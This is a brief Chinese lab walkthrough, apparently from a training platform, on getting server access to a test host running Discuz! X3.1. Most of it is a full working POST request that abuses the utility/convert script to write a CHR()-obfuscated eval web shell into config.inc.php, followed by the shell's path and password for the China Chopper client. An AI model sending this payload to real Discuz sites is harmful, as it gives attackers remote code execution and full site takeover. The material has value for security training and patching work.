这不是DZ漏洞？

本实验要求获取www.test.ichunqiu网站的服务器权限。
1,打开论坛，看下版本是dz！X3.1 就去某云那翻翻漏洞结果还真的找到了一个
漏洞:http://www.wooyun.org/bugs/wooyun-2010-045611

2，打开www.test.ichunqiu/utility/convert

直接使用EXP吧

POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1

Host: www.test.ichunqiu

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive

Content-Length: 199

Content-Type: application/x-www-form-urlencoded

newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

菜刀连接地址www.test.ichunqiu/utility/convert/data/config.inc.php 密码c